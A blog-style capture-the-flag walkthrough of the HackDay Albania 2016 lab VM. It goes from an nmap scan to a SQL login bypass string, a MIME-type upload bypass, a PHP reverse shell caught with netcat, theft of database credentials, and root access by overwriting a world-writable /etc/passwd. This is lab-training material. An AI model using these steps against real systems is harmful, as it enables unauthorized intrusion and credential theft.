HackDay CTF 2016 (Albania) – Pentesting Fun Stuff

Location

https://download.vulnhub.com/hackday/HackDay-Albania.ova

Introduction

Hack Day Albania is the event that brings together students passionate about cyber security. This activity is organized for the second consecutive year from ALCIRT with the support of MIAP.

Getting Started

Starting with a nmap scan.

┌─[n13mant@planetmars]─[~]

└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-28 09:46 CET

Nmap scan report for 192.168.171.3

Host is up (0.00023s latency).

Not shown: 65533 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)

|_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)

8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))

| http-robots.txt: 26 disallowed entries (15 shown)

| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/

| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/

| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/

|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: HackDay Albania 2016

MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.4

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

1 0.23 ms 192.168.171.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

No usable banner information at port 22. Checking the website on port 8008.
website01
The nmap scan showed the use of ‘robots.txt’. It has a long list of restricted pages.
Because I don’t speak Albanian, I need to let Google translate the found text: If I am, I know where to go;)
After removing the pop-up box Elliot from the show Mr. Robot is visible.
First checking the source code. There is a comment at the bottom: OK ok, but not here :)
The background picture didn’t had any information in it, so I start with the first page on the ‘robots.txt’ page.
Great…..Memes with Albanian text. I hope Google don’t mess up the translations and I get pointed into the wrong direction.
The translated text on the meme is: Is this the proper directory. Or is it jerk.
Right. After checking the second page it seems I’m being trolled. To automate my search a bit I create a small bash script to cURL the pages for me and give me back the html. If there is a different page, the outcome should tell me.

#!/bin/bash

while read x

do curl 192.168.171.3:8008/$x >> curl.txt

done < list

vulnbank01
vulnbank02
vulnbank03
When entering a single quote, I get the following error.
vulnbank04
Looks like a SQLi vulnerability. At first I tried SQLMap, but it couldn’t retrieve the databases. After a while I searched the internet for some information about SQL authentication bypass and after a while I found a nice list which I could load up into Burpsuite. Unfortunately I couldn’t get this to work either. But the idea of the list sounded good. So i started to probe it manually and after some time (a lot), I got in using the string '%1#.
vulnbank05
An uploading mechanism. First I tried to upload a php file containing phpinfo().
lfi01
To bypass the security I change the filename and MIME type with burpsuite.
lfi02
When I view the ticket I see that the command is being executed.
lfi03
Time for a reverse shell. For the reverse shell I use the php script from pentestmonkey and upload it to the server. From the browser I view the ‘ticket’ and the script gets executed. I have my reverse shell.

┌─[n13mant@planetmars]─[~]

└──╼ $nc -lvnp 31337

listening on [any] 31337 ...

connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 34432

Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

18:22:55 up 8:45, 0 users, load average: 0.00, 0.00, 0.00

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ python -c 'import pty;pty.spawn("/bin/bash");'

/bin/sh: 2: python: not found

$ whereis python

python: /usr/bin/python3.5m /usr/bin/python3.5 /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python

$ python3 -c 'import pty;pty.spawn("/bin/bash");'

www-data@hackday:/$

Now for some reconnaissance.

www-data@hackday:/$ cat /etc/*-release

cat /etc/*-release

DISTRIB_ID=Ubuntu

DISTRIB_RELEASE=16.04

DISTRIB_CODENAME=xenial

DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"

NAME="Ubuntu"

VERSION="16.04.1 LTS (Xenial Xerus)"

ID=ubuntu

ID_LIKE=debian

PRETTY_NAME="Ubuntu 16.04.1 LTS"

VERSION_ID="16.04"

HOME_URL="http://www.ubuntu.com/"

SUPPORT_URL="http://help.ubuntu.com/"

BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

UBUNTU_CODENAME=xenial

www-data@hackday:/$ uname -a

uname -a

Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ cat config.php | more

<tml/unisxcudkqjydw/vulnbank/client$ cat config.php | more

<?php

-----[SNIP]-----

$db_host = "127.0.0.1";

$db_name = "bank_database";

$db_user = "root";

$db_password = "NuCiGoGo321";

-----[SNIP]-----

www-data@hackday:/$ netstat -l

netstat -l

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 localhost:mysql *:* LISTEN

tcp 0 0 *:ssh *:* LISTEN

tcp6 0 0 [::]:8008 [::]:* LISTEN

tcp6 0 0 [::]:ssh [::]:* LISTEN

www-data@hackday:/$ mysql --host=localhost --user=root --password=NuCiGoGo321 bank_database

<-host=localhost --user=root --password=NuCiGoGo321 bank_database

mysql: [Warning] Using a password on the command line interface can be insecure.

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 29

Server version: 5.7.12-0ubuntu1.1 (Ubuntu)

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;

show databases;

+--------------------+

| Database |

+--------------------+

| information_schema |

| bank_database |

| mysql |

| performance_schema |

| sys |

| vulnbank |

+--------------------+

6 rows in set (0.00 sec)

mysql> use bank_database

use bank_database

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;

show tables;

+-------------------------+

| Tables_in_bank_database |

+-------------------------+

| klienti |

| tickets |

+-------------------------+

2 rows in set (0.00 sec)

mysql> select * from klienti;

select * from klienti;

+----+-------------+---------+---------+----------+------------+

+----+-------------+---------+---------+----------+------------+

+----+-------------+---------+---------+----------+------------+

2 rows in set (0.00 sec)

www-data@hackday:/$ cat /etc/passwd

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

syslog:x:104:108::/home/syslog:/bin/false

_apt:x:105:65534::/nonexistent:/bin/false

lxd:x:106:65534::/var/lib/lxd/:/bin/false

mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false

messagebus:x:108:112::/var/run/dbus:/bin/false

uuidd:x:109:113::/run/uuidd:/bin/false

dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false

sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin

taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

www-data@hackday:/$ ls -lah /etc | grep passwd

ls -lah /etc | grep passwd

-rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd

www-data@hackday:/etc$ ls -lah /home/taviso

ls -lah /home/taviso

total 32K

drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .

drwxr-xr-x 3 root root 4.0K Oct 9 13:13 ..

-rw------- 1 root root 17 Oct 29 23:07 .bash_history

-rw-r--r-- 1 taviso taviso 220 Oct 9 13:13 .bash_logout

-rw-r--r-- 1 taviso taviso 3.7K Oct 9 13:13 .bashrc

drwx------ 2 taviso taviso 4.0K Oct 9 13:16 .cache

drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano

-rw-r--r-- 1 taviso taviso 655 Oct 9 13:13 .profile

-rw-r--r-- 1 taviso taviso 0 Oct 29 23:07 .sudo_as_admin_successful

www-data@hackday:/$ cat /etc/group | grep taviso

cat /etc/group | grep taviso

adm:x:4:syslog,taviso

cdrom:x:24:taviso

sudo:x:27:taviso

dip:x:30:taviso

plugdev:x:46:taviso

lxd:x:110:taviso

taviso:x:1000:

lpadmin:x:117:taviso

sambashare:x:118:taviso

So ‘taviso’ is in the sudo group and the /etc/passwd is writable.

┌─[n13mant@planetmars]─[~/Desktop]

└──╼ $mkpasswd --method=sha-512 password

$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1

www-data@hackday:/$ sed -e 's/taviso:x/taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd

<nu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd

www-data@hackday:/$ cp /tmp/passwd /etc/passwd

cp /tmp/passwd /etc/passwd

www-data@hackday:/$ cat /etc/passwd | grep taviso

cat /etc/passwd | grep taviso

taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

www-data@hackday:/$ su taviso

su taviso

Password: password

taviso@hackday:/$ sudo -l

sudo -l

Matching Defaults entries for taviso on hackday:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:

(ALL : ALL) ALL

taviso@hackday:/$ sudo su

sudo su

root@hackday:/# cd /root

cd /root

root@hackday:~# ls -lah

ls -lah

total 28K

drwx------ 3 root root 4.0K Oct 22 17:21 .

drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..

-rw------- 1 root root 58 Oct 22 17:21 .bash_history

-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc

-rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt

drwxr-xr-x 2 root root 4.0K Oct 9 13:18 .nano

-rw-r--r-- 1 root root 148 Aug 17 2015 .profile

root@hackday:~# cat flag.txt

cat flag.txt

Urime,

Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

And that’s it. The last part said: Congratulations, Now begins the report! (or at least that’s what Google makes of it).
The flag is a md5 hash > plaintext = rio

THE END

Location

Introduction

Getting Started

Leave a Reply Cancel reply